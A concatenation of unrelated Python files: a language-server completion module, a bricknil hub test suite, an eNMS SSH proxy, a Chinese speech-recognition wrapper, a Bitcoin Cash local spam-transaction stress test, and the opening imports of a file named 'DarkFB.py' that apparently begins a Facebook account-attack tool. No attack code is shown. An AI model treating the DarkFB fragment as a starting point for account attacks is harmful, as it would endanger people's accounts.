if c['label'] in self.vocab:
tmp = np.zeros(len(self.encodings))
tmp[self.encodings[c['label']]] = 1
enc_completions[c['label']] = (c, tmp)
else:
oov_completions.append(c)
prediction_scores = []
model_input_seq = encoded_line.reshape(1, 40, 1991)
for c in enc_completions.keys():
comp, enc = enc_completions[c]
model_input_compl = [enc]
score = self.model.predict([np.array(model_input_seq), np.array(model_input_compl)])
prediction_scores.append((comp, score[0][0]))
prediction_scores = sorted(prediction_scores, key=lambda x: x[1], reverse=True)
preds = [pred for (pred, score) in prediction_scores]
preds = preds + oov_completions
for i, comp in enumerate(preds):
comp['sortText'] = chr(ord('a') + i)
comp['insertText'] = comp['label']
log.debug("completions are here")
log.debug(preds)
return {
'isIncomplete': True,
'items': preds
}
def completion_detail(self, item):
detail = self._hook('pyls_completion_detail', item=item)
return detail
def definitions(self, doc_uri, position):
return flatten(self._hook('pyls_definitions', doc_uri, position=position))
def document_symbols(self, doc_uri):
return flatten(self._hook('pyls_document_symbols', doc_uri))
def execute_command(self, command, arguments):
return self._hook('pyls_execute_command', command=command, arguments=arguments)
def format_document(self, doc_uri):
return self._hook('pyls_format_document', doc_uri)
def format_range(self, doc_uri, range):
return self._hook('pyls_format_range', doc_uri, range=range)
def highlight(self, doc_uri, position):
return flatten(self._hook('pyls_document_highlight', doc_uri, position=position)) or None
def hover(self, doc_uri, position):
return self._hook('pyls_hover', doc_uri, position=position) or {'contents': ''}
@_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
def lint(self, doc_uri, is_saved):
# Since we're debounced, the document may no longer be open
workspace = self._match_uri_to_workspace(doc_uri)
if doc_uri in workspace.documents:
workspace.publish_diagnostics(
doc_uri,
flatten(self._hook('pyls_lint', doc_uri, is_saved=is_saved))
)
def references(self, doc_uri, position, exclude_declaration):
return flatten(self._hook(
'pyls_references', doc_uri, position=position,
exclude_declaration=exclude_declaration
))
def rename(self, doc_uri, position, new_name):
return self._hook('pyls_rename', doc_uri, position=position, new_name=new_name)
def signature_help(self, doc_uri, position):
return self._hook('pyls_signature_help', doc_uri, position=position)
def folding(self, doc_uri):
return self._hook('pyls_folding_range', doc_uri)
def m_text_document__did_close(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.rm_document(textDocument['uri'])
def m_text_document__did_open(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.put_document(textDocument['uri'], textDocument['text'], version=textDocument.get('version'))
self._hook('pyls_document_did_open', textDocument['uri'])
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__did_change(self, contentChanges=None, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
for change in contentChanges:
workspace.update_document(
textDocument['uri'],
change,
version=textDocument.get('version')
)
self.lint(textDocument['uri'], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__code_action(self, textDocument=None, range=None, context=None, **_kwargs):
return self.code_actions(textDocument['uri'], range, context)
def m_text_document__code_lens(self, textDocument=None, **_kwargs):
return self.code_lens(textDocument['uri'])
def m_text_document__completion(self, textDocument=None, position=None, **_kwargs):
return self.completions(textDocument['uri'], position)
def m_completion_item__resolve(self, label=None, **_kwargs):
return self.completion_detail(label)
def m_text_document__definition(self, textDocument=None, position=None, **_kwargs):
return self.definitions(textDocument['uri'], position)
def m_text_document__document_highlight(self, textDocument=None, position=None, **_kwargs):
return self.highlight(textDocument['uri'], position)
def m_text_document__hover(self, textDocument=None, position=None, **_kwargs):
return self.hover(textDocument['uri'], position)
def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
return self.document_symbols(textDocument['uri'])
def m_text_document__formatting(self, textDocument=None, _options=None, **_kwargs):
# For now we're ignoring formatting options.
return self.format_document(textDocument['uri'])
def m_text_document__rename(self, textDocument=None, position=None, newName=None, **_kwargs):
return self.rename(textDocument['uri'], position, newName)
def m_text_document__folding_range(self, textDocument=None, **_kwargs):
return self.folding(textDocument['uri'])
def m_text_document__range_formatting(self, textDocument=None, range=None, _options=None, **_kwargs):
# Again, we'll ignore formatting options for now.
return self.format_range(textDocument['uri'], range)
def m_text_document__references(self, textDocument=None, position=None, context=None, **_kwargs):
exclude_declaration = not context['includeDeclaration']
return self.references(textDocument['uri'], position, exclude_declaration)
def m_text_document__signature_help(self, textDocument=None, position=None, **_kwargs):
return self.signature_help(textDocument['uri'], position)
def m_workspace__did_change_configuration(self, settings=None):
self.config.update((settings or {}).get('pyls', {}))
for workspace_uri in self.workspaces:
workspace = self.workspaces[workspace_uri]
workspace.update_config(self.config)
for doc_uri in workspace.documents:
self.lint(doc_uri, is_saved=False)
def m_workspace__did_change_workspace_folders(self, added=None, removed=None, **_kwargs):
for removed_info in removed:
removed_uri = removed_info['uri']
self.workspaces.pop(removed_uri)
for added_info in added:
added_uri = added_info['uri']
self.workspaces[added_uri] = Workspace(added_uri, self._endpoint, self.config)
# Migrate documents that are on the root workspace and have a better
# match now
doc_uris = list(self.workspace._docs.keys())
for uri in doc_uris:
doc = self.workspace._docs.pop(uri)
new_workspace = self._match_uri_to_workspace(uri)
new_workspace._docs[uri] = doc
def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
changed_py_files = set()
config_changed = False
for d in (changes or []):
if d['uri'].endswith(PYTHON_FILE_EXTENSIONS):
changed_py_files.add(d['uri'])
elif d['uri'].endswith(CONFIG_FILEs):
config_changed = True
if config_changed:
self.config.settings.cache_clear()
elif not changed_py_files:
# Only externally changed python files and lint configs may result in changed diagnostics.
return
for workspace_uri in self.workspaces:
workspace = self.workspaces[workspace_uri]
for doc_uri in workspace.documents:
# Changes in doc_uri are already handled by m_text_document__did_save
if doc_uri not in changed_py_files:
self.lint(doc_uri, is_saved=False)
def m_workspace__execute_command(self, command=None, arguments=None):
return self.execute_command(command, arguments)
def flatten(list_of_lists):
return [item for lst in list_of_lists for item in lst]
def merge(list_of_dicts):
return {k: v for dictionary in list_of_dicts for k, v in dictionary.items()}
|
test_hub.py | import pytest
import os, struct, copy, sys
from functools import partial
import logging, threading
from asyncio import coroutine
from curio import kernel, sleep, spawn, Event
import time
from mock import Mock
from mock import patch, call, create_autospec
from mock import MagicMock
from mock import PropertyMock
from hypothesis import given, example, settings
from hypothesis import strategies as st
from bricknil.message_dispatch import MessageDispatch
from bricknil.messages import UnknownMessageError, HubPropertiesMessage
from bricknil.sensor import *
from bricknil.const import DEVICES
from bricknil import attach, start
from bricknil.hub import PoweredUpHub, Hub, BoostHub, DuploTrainHub, PoweredUpRemote
import bricknil
import bricknil.const
class TestSensors:
def setup(self):
# Create the main dispatch
self.hub = MagicMock()
self.m = MessageDispatch(self.hub)
self.sensor_list = [ CurrentSensor,
DuploSpeedSensor,
VisionSensor,
InternalTiltSensor,
ExternalMotionSensor,
ExternalTiltSensor,
RemoteButtons,
Button,
DuploVisionSensor,
VoltageSensor,
]
self.hub_list = [ PoweredUpHub, BoostHub, DuploTrainHub, PoweredUpRemote]
def _with_header(self, msg:bytearray):
l = len(msg)+2
assert l<127
return bytearray([l, 0]+list(msg))
def _draw_capabilities(self, data, sensor):
if len(sensor.allowed_combo) > 0:
# test capabilities 1 by 1,
# or some combination of those in the allowed_combo list
capabilities = data.draw(
st.one_of(
st.lists(st.sampled_from([cap.name for cap in list(sensor.capability)]), min_size=1, max_size=1),
st.lists(st.sampled_from(sensor.capability), min_size=1, max_size=1),
st.lists(st.sampled_from(sensor.allowed_combo), min_size=1, unique=True)
)
)
else:
# if no combos allowed, then just test 1 by 1
capabilities = data.draw(st.lists(st.sampled_from(sensor.capability), min_size=1, max_size=1))
return capabilities
def _get_hub_class(self, hub_type, sensor, sensor_name, capabilities):
stop_evt = Event()
@attach(sensor, name=sensor_name, capabilities=capabilities)
class TestHub(hub_type):
async def sensor_change(self):
pass
async def run(self):
pass
await stop_evt.wait()
return TestHub, stop_evt
#@patch('bricknil.hub.PoweredUpHub', autospec=True, create=True)
@given(data = st.data())
def test_attach_sensor(self, data):
sensor_name = 'sensor'
sensor = data.draw(st.sampled_from(self.sensor_list))
capabilities = self._draw_capabilities(data, sensor)
hub_type = data.draw(st.sampled_from(self.hub_list))
TestHub, stop_evt = self._get_hub_class(hub_type, sensor, sensor_name, capabilities)
hub = TestHub('testhub')
# Check to make sure we have the peripheral attached
# and the sensor inserted as an attribute
assert sensor_name in hub.peripherals
assert hasattr(hub, sensor_name)
@given(data = st.data())
def test_run_hub(self, data):
Hub.hubs = []
sensor_name = 'sensor'
sensor = data.draw(st.sampled_from(self.sensor_list))
capabilities = self._draw_capabilities(data, sensor)
hub_type = data.draw(st.sampled_from(self.hub_list))
TestHub, stop_evt = self._get_hub_class(hub_type, sensor, sensor_name, capabilities)
hub = TestHub('test_hub')
# Start the hub
#kernel.run(self._emit_control(TestHub))
with patch('Adafruit_BluefruitLE.get_provider') as ble,\
patch('bricknil.ble_queue.USE_BLEAK', False) as use_bleak:
ble.return_value = MockBLE(hub)
sensor_obj = getattr(hub, sensor_name)
sensor_obj.send_message = Mock(side_effect=coroutine(lambda x,y: "the awaitable should return this"))
kernel.run(self._emit_control, data, hub, stop_evt, ble(), sensor_obj)
#start(system)
async def _wait_send_message(self, mock_call, msg):
print("in mock")
while not mock_call.call_args:
await sleep(0.01)
while not msg in mock_call.call_args[0][0]:
print(mock_call.call_args)
await sleep(0.01)
async def _emit_control(self, data, hub, hub_stop_evt, ble, sensor):
async def dummy():
pass
system = await spawn(bricknil.bricknil._run_all(ble, dummy))
while not hub.peripheral_queue:
await sleep(0.1)
#await sleep(3)
port = data.draw(st.integers(0,254))
await hub.peripheral_queue.put( ('attach', (port, sensor.sensor_name)) )
# Now, make sure the sensor sent an activate updates message
if sensor.sensor_name == "Button":
await self._wait_send_message(sensor.send_message, 'Activate button')
else:
await self._wait_send_message(sensor.send_message, 'Activate SENSOR')
# Need to generate a value on the port
# if False:
msg = []
if len(sensor.capabilities) == 1:
# Handle single capability
for cap in sensor.capabilities:
n_datasets, byte_count = sensor.datasets[cap][0:2]
for i in range(n_datasets):
for b in range(byte_count):
msg.append(data.draw(st.integers(0,255)))
msg = bytearray(msg)
await hub.peripheral_queue.put( ('value_change', (port, msg)))
elif len(sensor.capabilities) > 1:
modes = 1
msg.append(modes)
for cap_i, cap in enumerate(sensor.capabilities):
if modes & (1<<cap_i):
n_datasets, byte_count = sensor.datasets[cap][0:2]
for i in range(n_datasets):
for b in range(byte_count):
msg.append(data.draw(st.integers(0,255)))
msg = bytearray(msg)
await hub.peripheral_queue.put( ('value_change', (port, msg)))
await hub_stop_evt.set()
await system.join()
@given(data = st.data())
def test_run_hub_with_bleak(self, data):
Hub.hubs = []
sensor_name = 'sensor'
sensor = data.draw(st.sampled_from(self.sensor_list))
capabilities = self._draw_capabilities(data, sensor)
hub_type = data.draw(st.sampled_from(self.hub_list))
TestHub, stop_evt = self._get_hub_class(hub_type, sensor, sensor_name, capabilities)
hub = TestHub('test_hub')
async def dummy():
pass
# Start the hub
#MockBleak = MagicMock()
sys.modules['bleak'] = MockBleak(hub)
with patch('bricknil.bricknil.USE_BLEAK', True), \
patch('bricknil.ble_queue.USE_BLEAK', True) as use_bleak:
sensor_obj = getattr(hub, sensor_name)
sensor_obj.send_message = Mock(side_effect=coroutine(lambda x,y: "the awaitable should return this"))
from bricknil.bleak_interface import Bleak
ble = Bleak()
# Run curio in a thread
async def dummy(): pass
async def start_curio():
system = await spawn(bricknil.bricknil._run_all(ble, dummy))
while len(ble.devices) < 1 or not ble.devices[0].notify:
await sleep(0.01)
await stop_evt.set()
print("sending quit")
await ble.in_queue.put( ('quit', ''))
#await system.join()
print('system joined')
def start_thread():
kernel.run(start_curio)
t = threading.Thread(target=start_thread)
t.start()
print('started thread for curio')
ble.run()
t.join()
class MockBleak(MagicMock):
def __init__(self, hub):
MockBleak.hub = hub
pass
@classmethod
async def discover(cls, timeout, loop):
# Need to return devices here, which is a list of device tuples
hub = MockBleak.hub
devices = [MockBleakDevice(hub.uart_uuid, hub.manufacturer_id)]
return devices
@classmethod
def BleakClient(cls, address, loop):
print("starting BleakClient")
hub = MockBleak.hub
device = MockBleakDevice(hub.uart_uuid, hub.manufacturer_id)
return device
class MockBleakDevice:
def __init__(self, uuid, manufacturer_id):
self.uuids = [str(uuid)]
self.manufacturer_data = {'values': [0, manufacturer_id] }
self.name = ""
self.address = "XX:XX:XX:XX:XX"
self.notify = False
async def connect(self):
self.characteristics = MockBleak.hub.char_uuid
pass
async def write_gatt_char(self, char_uuid, msg_bytes):
print(f'Got msg on {char_uuid}: {msg_bytes}')
async def start_notify(self, char_uuid, handler):
print("started notify")
self.notify = True
async def disconnect(self):
print("device disconnected")
class MockBLE:
def __init__(self, hub):
self.hub = hub
def initialize(self):
print("initialized")
def clear_cached_data(self):
pass
def get_default_adapter(self):
self.mock_adapter = MockAdapter()
return self.mock_adapter
def find_devices(self, service_uuids):
self.device = MockDevice(hub_name = self.hub.ble_name, hub_id = self.hub.manufacturer_id)
return [self.device]
def run_mainloop_with(self, func):
print("run mainloop")
func()
class MockAdapter:
def __init__(self):
self.name = 'Mock adapter'
def power_on(self):
pass
def start_scan(self):
print("start scan called")
def stop_scan(self):
print("stop scan called")
class MockDevice:
def __init__(self, hub_name, hub_id):
self.advertised = [-1, -1, -1, -1, hub_id]
self.id = 'XX:XX:XX:XX:XX:XX'
self.name = hub_name
def connect(self):
print("device connect called")
def discover(self, uart_uuid, char_uuid):
print(f'discover called on uart {uart_uuid}, char {char_uuid}')
self.uart_uuid = uart_uuid
self.char = char_uuid
def find_service(self, uart_uuid):
self.uart = MockUart()
return self.uart
def disconnect(self):
print('device disconnect called')
class MockUart:
def __init__(self):
pass
def find_characteristic(self, char_uuid):
self.char_uuid = char_uuid
return self
def start_notify(self, callback):
# Spawn a task to do the attachments, etc
self.notify = callback
def write_value(self, values):
print(f'received values: {values}') |
ssh.py | from logging import getLogger, FileHandler, Formatter
from paramiko import (
AUTH_FAILED,
AUTH_SUCCESSFUL,
RSAKey,
OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED as OPEN_FAILED,
OPEN_SUCCEEDED,
ServerInterface,
SSHClient,
Transport,
WarningPolicy,
)
from pathlib import Path
from socket import AF_INET, socket, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from string import printable
from threading import Event, Thread
from time import sleep
from eNMS.database import db
class Client(SSHClient):
def __init__(self, hostname, username, password):
super().__init__()
self.load_system_host_keys()
self.set_missing_host_key_policy(WarningPolicy)
self.connect(
hostname=hostname, username=username, password=password, timeout=3,
)
self.shell = self.invoke_shell()
class Server(ServerInterface):
def __init__(self, port, uuid):
self.event = Event()
self.username = uuid
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind(("", port))
sock.listen(100)
sock.settimeout(30)
self.transport = Transport(sock.accept()[0])
try:
host_key = RSAKey.from_private_key_file("rsa.key")
except FileNotFoundError:
host_key = RSAKey.generate(2048)
host_key.write_private_key_file("rsa.key")
self.transport.add_server_key(host_key)
self.transport.start_server(server=self)
self.channel = self.transport.accept(10)
def check_channel_request(self, kind, *_):
return OPEN_SUCCEEDED if kind == "session" else OPEN_FAILED
def check_auth_none(self, username):
return AUTH_SUCCESSFUL if username == self.username else AUTH_FAILED
def check_channel_shell_request(self, *_):
self.event.set()
return True
def check_channel_pty_request(self, *_):
return True
class SshConnection:
def __init__(self, hostname, username, password, session_id, uuid, port):
self.client = Client(hostname, username, password)
path = Path.cwd() / "logs" / "ssh_sessions"
path.mkdir(parents=True, exist_ok=True)
self.logger = getLogger(hostname)
if not self.logger.handlers:
file_handler = FileHandler(filename=path / f"{hostname}.log")
formatter = Formatter("%(asctime)s %(levelname)-8s %(message)s")
file_handler.setFormatter(formatter)
self.logger.addHandler(file_handler)
def start_session(self, session_id, uuid, port):
self.server = Server(port, uuid)
Thread(target=self.receive_data, args=(session_id,)).start()
Thread(target=self.send_data).start()
def receive_data(self, session_id):
log, session = "", db.fetch("session", id=session_id)
while not self.client.shell.closed:
response = self.client.shell.recv(1024)
if not response:
continue
self.server.channel.send(response)
log += "".join(c for c in str(response, "utf-8") if c in printable)
if "\n" not in log:
continue
else:
parsed_log = "\n".join(line for line in log.splitlines() if line)
self.logger.info(parsed_log)
session.content += parsed_log
log = ""
sleep(0.1)
db.session.commit()
def send_data(self):
while not self.client.shell.closed:
data = self.server.channel.recv(512)
if not data:
break
try:
self.client.shell.send(data)
except OSError:
break
sleep(0.1)
self.client.shell.close()
self.server.transport.close()
|
__init__.py | import sys
import win32com.client
import speech_recognition as sr
import threading
import time
from . import common
__all__ = [
'語音合成', '設定語音音量', '設定語音速度', '語音說完了嗎',
'語音辨識google', '辨識成功了嗎', '取得辨識文字',
'等待語音說完','語音辨識azure', '暫停語音辨識',
'繼續語音辨識', '語音辨識中嗎',
]
# tts init
common.speaker = win32com.client.Dispatch("SAPI.SpVoice")
common.speaker.Volume = common.DEFAULT_VOLUME
common.speaker.Rate = common.DEFAULT_RATE
# recognization init
common.recognizer = sr.Recognizer()
common.recognizer.pause_threshold = 0.5
try:
common.mic = sr.Microphone()
except OSError:
print('<<無麥克風裝置, 無法使用語音辨識>>')
common.mic = None
common.lock = threading.Lock()
### Custom Exceptions
# class ImageReadError(Exception):
# def __init__(self, value):
# message = f"無法讀取圖片檔 (檔名:{value})"
# super().__init__(message)
# stt
### wrapper functions
def 語音合成(text, 等待=True):
if 等待:
common.speaker.Speak(text, common.SVSFDefault)
else:
common.speaker.Speak(text, common.SVSFlagsAsync)
def 設定語音音量(volume):
volume = max(min(volume,100), 0)
common.speaker.Volume = volume
def 設定語音速度(rate):
rate = max(min(rate,10), -10)
common.speaker.Rate = rate
def 語音說完了嗎(ms=1):
return common.speaker.WaitUntilDone(ms)
def 等待語音說完():
return common.speaker.WaitUntilDone(-1)
#### recog wrapper function
def recog_callback(recognizer, audio):
if common.recog_paused :
print('pausing')
return
try:
if common.recog_service == 'google':
text = recognizer.recognize_google(audio,language="zh-TW" )
elif common.recog_service == 'azure':
text = recognizer.recognize_azure(audio,language="zh-TW",
key=common.recog_key, location=common.recog_location )
if text :
print('<<',common.recog_service, '辨識為: ', text,'>>')
with common.lock:
common.recog_text = text
common.recog_countdown -= 1
if common.recog_countdown <= 0 :
common.stopper(wait_for_stop=False)
common.recog_service = False
print('<<超過次數,語音辨識程式停止>>')
except sr.UnknownValueError:
print("<<語音內容無法辨識>>")
common.recog_countdown -= 1
except sr.RequestError as e:
print('<<',common.recog_service,"語音辦識無回應(可能無網路或是超過限制)>>: {0}".format(e))
common.recog_countdown -= 1
########## rewrite background listen recog thread
def recog_thread():
with common.mic as source:
print('<<校正麥克風...>>')
common.recognizer.adjust_for_ambient_noise(source)
while True:
if common.recog_paused:
#print('pausing')
time.sleep(0.1)
continue
try:
voice = common.recognizer.listen(source, timeout=3, phrase_time_limit=4)
except sr.WaitTimeoutError:
print('<<超過等待時間未有聲音>>')
time.sleep(0.1)
continue
if common.recog_discard:
#print('paused during listening, discard voice')
with common.lock:
common.recog_discard = False
continue
try:
if common.recog_service == 'google':
text = common.recognizer.recognize_google(voice,language="zh-TW" )
print("<<Google 語音辨識為:", text,'>>')
elif common.recog_service == 'azure':
text = common.recognizer.recognize_azure(voice,language="zh-TW",
key=common.recog_key, location=common.recog_location )
print("<<Azure 語音辨識為:", text,'>>')
#text = common.recognizer.recognize_google(voice, language="zh-tw")
#print("<<Google 語音辨識為:", text,'>>')
if common.recog_discard:
#print('paused during recognizing, discard text')
with common.lock:
common.recog_discard = False
continue
if text:
with common.lock:
common.recog_text = text
common.recog_countdown -= 1
if common.recog_countdown <= 0 :
print('<<超過次數,語音辨識程式停止>>')
common.recog_service = False
break
except sr.UnknownValueError:
print("<<語音內容無法辨識>>")
common.recog_countdown -= 1
except sr.RequestError as e:
print('<<',common.recog_service,"語音辦識無回應(可能無網路或是超過限制)>>: {0}".format(e))
common.recog_countdown -= 1
def 語音辨識google(次數=15):
if not common.mic:
print('<<無麥克風裝置, 無法使用語音辨識>>')
return
if common.recog_service:
print("<<語音辨識已啟動>>")
return
# start recog service
common.recog_countdown = 次數
common.recog_service = 'google'
common.recog_paused = False
t = threading.Thread(target=recog_thread)
t.daemon = True
t.start()
print('<<開始語音辨識: 採google服務>>')
# def 語音辨識google(次數=15):
# if common.recog_service:
# print("<<語音辨識已啟動>>")
# return
# # start recog service
# with common.mic as source:
# print('<<校正麥克風...>>')
# common.recognizer.adjust_for_ambient_noise(source)
# common.stopper = common.recognizer.listen_in_background(
# common.mic, recog_callback, phrase_time_limit=10)
# print('<<開始語音辨識: 採google服務>>\n<<請說話>>')
# common.recog_countdown = 次數
# common.recog_service = 'google'
# common.recog_paused = False
def 語音辨識azure(key, location='westus'):
if not common.mic:
print('<<無麥克風裝置, 無法使用語音辨識>>')
return
if common.recog_service:
print("<<語音辨識已啟動>>")
return
common.recog_countdown = 1000
common.recog_service = 'azure'
common.recog_key = key
common.recog_location = location
common.recog_paused = False
t = threading.Thread(target=recog_thread)
t.daemon = True
t.start()
print('<<開始語音辨識: 採azure服務>>')
# def 語音辨識azure(key, location='westus'):
# if common.recog_service:
# print("<<語音辨識已啟動>>")
# return
# with common.mic as source:
# print('<<校正麥克風...>>')
# common.recognizer.adjust_for_ambient_noise(source)
# common.stopper = common.recognizer.listen_in_background(
# common.mic, recog_callback, phrase_time_limit=10)
# print('<<開始語音辨識: 採azure服務>>\n<<請說話>>')
# common.recog_countdown = 1000
# common.recog_service = 'azure'
# common.recog_key = key
# common.recog_location = location
# common.recog_paused = False
# def 關閉語音辨識():
# if common.recog_service:
# common.stopper(wait_for_stop=False)
# common.recog_service = False
# print('<<語音辨識程式停止>>')
# else:
# print('<<無語音辨識程式>>')
def 辨識成功了嗎():
if common.recog_service and common.recog_text:
return True
else:
return False
def 取得辨識文字():
tmp = common.recog_text
with common.lock:
common.recog_text = ''
return tmp
def 暫停語音辨識():
if not common.recog_paused:
with common.lock:
common.recog_text = ''
common.recog_paused = True
common.recog_discard = True
print('<<語音辨識暫停>>')
def 繼續語音辨識():
if common.recog_paused:
with common.lock:
common.recog_paused = False
print('<<語音辨識繼續>>')
def 語音辨識中嗎():
return not common.recog_paused and not common.recog_discard
if __name__ == '__main__' :
pass
|
p2p_stresstest.py | #!/usr/bin/env python3
# Copyright (c) 2019-2020 Jonathan Toomim
# Copyright (c) 2020 The Bitcoin Cash Node developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
stresstest -- test spam generation and localhost block propagation
This test will be slow at generating transactions unless
you have a very fast SSD or a ramdisk for the wallet files.
It is strongly recommended to run it on a ramdisk.
You can set one up up on Linux like this (adapt mountpoint as needed):
sudo mount -t tmpfs size=4G /mnt/my/ramdisk
sudo chmod a+x /mnt/my/ramdisk
mkdir /mnt/my/ramdisk/tmp
export TMPDIR=/mnt/my/ramdisk/tmp
Then build or copy the software you want to test, onto the ramdisk and
run this script from there.
'''
import http
import traceback
import threading
import time
import os
import sys
from decimal import Decimal
sys.path.insert(0, os.path.join('..', 'functional'))
import test_framework.util # noqa: E402
from test_framework.util import sync_blocks # noqa: E402
from test_framework.test_framework import BitcoinTestFramework # noqa: E402
from test_framework.mininode import P2PInterface # noqa: E402
from test_framework.authproxy import JSONRPCException # noqa: E402
NUM_NODES = 4
# 168k tx is 32 MB
TX_PER_BLOCK = 10000
# set this below your hardware's peak generation rate if you want
# to have transaction validation happen in parallel with generation,
# or if you otherwise want to simulate lower generation rates.
MAX_GENERATION_RATE_PER_NODE = 15000
if NUM_NODES > test_framework.util.MAX_NODES:
test_framework.util.MAX_NODES = NUM_NODES
# TestNode: A peer we use to send messages to bitcoind, and store responses.
class TestNode(P2PInterface):
pass
class StressTest(BitcoinTestFramework):
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = NUM_NODES
self.extra_args = [["-blockmaxsize=32000000",
"-checkmempool=0",
"-txbroadcastrate=999999",
"-debugexclude=net",
"-debugexclude=mempool"]] * self.num_nodes
def make_utxos(self, target=10000):
print("Running make_utxos()...")
rootamount = 49.0 / len(self.nodes)
fanout = target + 1 if target < 100 else 100 if target < 100 * 50 else target // 50
num_stages = -(-target // fanout) + 1 # rounds up
print("Fanout={}, num_stages={}".format(fanout, num_stages))
self.nodes[0].generate(101)
self.nodes[0].generate(num_stages * self.num_nodes - 1)
time.sleep(0.2)
self.nodes[0].generate(1)
node_addresses = [[] for _ in self.nodes]
self.node_addresses = node_addresses
t0 = time.time()
def get_addresses(node, addresslist, n):
for _ in range(n):
addresslist.append(node.getnewaddress())
threads = [threading.Thread(target=get_addresses,
args=(self.nodes[i], node_addresses[i], fanout))
for i in range(len(self.nodes))]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
t1 = time.time()
print("Generating addresses took {:3.3f} sec".format(t1 - t0))
sync_blocks(self.nodes, timeout=10)
for i in range(self.num_nodes - 1, 0, -1):
amount = Decimal(round(rootamount / (fanout + 1) * 1e8)) / Decimal(1e8)
payments = {node_addresses[i][n]: amount for n in range(fanout)}
t1 = time.time()
for stage in range(num_stages):
self.nodes[0].sendmany('', payments)
t2 = time.time()
print("Filling node wallets took {:3.3f} sec for stage {}:{}".format(t2 - t1, i, stage))
self.nodes[0].generate(1)
sync_blocks(self.nodes)
for i in range(1 + (target * self.num_nodes) // 20000):
self.nodes[0].generate(1)
sync_blocks(self.nodes, timeout=20)
blk = self.nodes[0].getblock(self.nodes[0].getbestblockhash(), 1)
print("Block has {} transactions and is {} bytes".format(len(blk['tx']), blk['size']))
return amount
def check_mempools(self):
results = []
for node in self.nodes:
res = node.getmempoolinfo()
results.append(res)
print("Mempool sizes:\t", ("%7i " * len(self.nodes)) % tuple([r['size'] for r in results]), '\t',
"Mempool bytes:\t", ("%9i " * len(self.nodes)) % tuple([r['bytes'] for r in results]))
return [r['size'] for r in results]
def generate_spam(self, value, txcount):
def helper(node, count, rate=100):
t = time.time()
addresses = self.node_addresses[node]
for i in range(0, count):
now = time.time()
if i / (now - t) > rate:
time.sleep(i / rate - (now - t))
if not (i % 500):
print("Node {:2d}\ttx {:5d}\tat {:3.3f} sec\t({:3.0f} tx/sec)".format(node,
i, time.time() - t, (i / (time.time() - t))))
add = addresses[i % len(addresses)]
try:
self.nodes[node].sendtoaddress(add, value, '', '', False, 1)
except http.client.CannotSendRequest:
self.nodes[node].sendtoaddress(add, value, '', '', False, 1)
except JSONRPCException:
print("Warning: this bitcoind appears to not support the 'fast' argument for sendtoaddress")
self.nodes[node].sendtoaddress(add, value, '', '', False)
except BaseException:
print("Node {} had a fatal error on tx {}:".format(node, i))
traceback.print_exc()
break
threads = [threading.Thread(target=helper, args=(n, txcount, MAX_GENERATION_RATE_PER_NODE))
for n in range(1, len(self.nodes))]
t0 = time.time()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
t1 = time.time()
print("Generating spam took {:3.3f} sec for {} tx (total {:4.0f} tx/sec)".format(t1 - t0,
(self.num_nodes - 1) * txcount, (self.num_nodes - 1) * txcount / (t1 - t0)))
startresults = results = self.check_mempools()
onedone = False
finishresults = []
timeout = 0
oldresults = self.check_mempools()
while [r for r in results if abs(r - results[0]) > 10] and (timeout < 5):
time.sleep(1)
results = self.check_mempools()
if results == oldresults:
timeout += 1
else:
timeout = 0
oldresults = results
if not onedone and [r for r in results if abs(r - txcount * (self.num_nodes - 1)) < 10]:
finishresults = results
t1b = time.time()
onedone = True
t2 = time.time()
print("Mempool sync took {:3.3f} sec".format(t2 - t1))
if timeout >= 5:
print("Warning: Not all transactions were fully propagated")
if not finishresults:
t1b = time.time()
finishresults = results
print("Warning: Number of mempool transactions was at least 10 less than expected")
deltas = [r - s for r, s in zip(finishresults, startresults)]
print("Per-node ATMP tx/sec: " + ("\t%4.0f" * self.num_nodes) % tuple([d / (t1b - t1) for d in deltas]))
print("Average mempool sync rate: \t{:4.0f} tx/sec".format(sum(deltas) / (t1b - t1) / len(deltas)))
for i in range(2):
t2a = time.time()
oldheight = self.nodes[0].getblockcount()
if not i:
print("Generating block ", end="")
self.nodes[0].generate(1)
t2b = time.time()
if not i:
print("took {:3.3f} sec".format(t2b - t2a))
for n in range(self.num_nodes):
while self.nodes[n].getblockcount() == oldheight:
time.sleep(0.05)
t2c = time.time()
if not i:
print("{}:{:6.3f} ".format(n, t2c - t2b), end="")
if not i:
print()
sync_blocks(self.nodes, timeout=180)
t2c = time.time()
if not i:
print("Propagating block took {:3.3f} sec -- {:3.3f} sec per hop".format(t2c -
t2b, (t2c - t2b) / (self.num_nodes - 1)))
blk = self.nodes[0].getblock(self.nodes[0].getbestblockhash(), 1)
if not i:
print("Block has {} transactions and is {} bytes".format(len(blk['tx']), blk['size']))
def run_test(self):
# Setup the p2p connections
self.log.info("Running tests:")
print(self.nodes[0].getmempoolinfo())
tx_per_node = int(TX_PER_BLOCK / (self.num_nodes - 1))
# We will need UTXOs to construct transactions in later tests.
utxo_value = self.make_utxos(tx_per_node)
spend_value = utxo_value
for i in range(5):
spend_value = Decimal((spend_value * 100000000 - 192)) / Decimal(1e8)
print("Spam block generation round {}".format(i))
self.generate_spam(spend_value, txcount=int(tx_per_node))
if __name__ == '__main__':
StressTest().main()
|
DarkFB.py | # -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
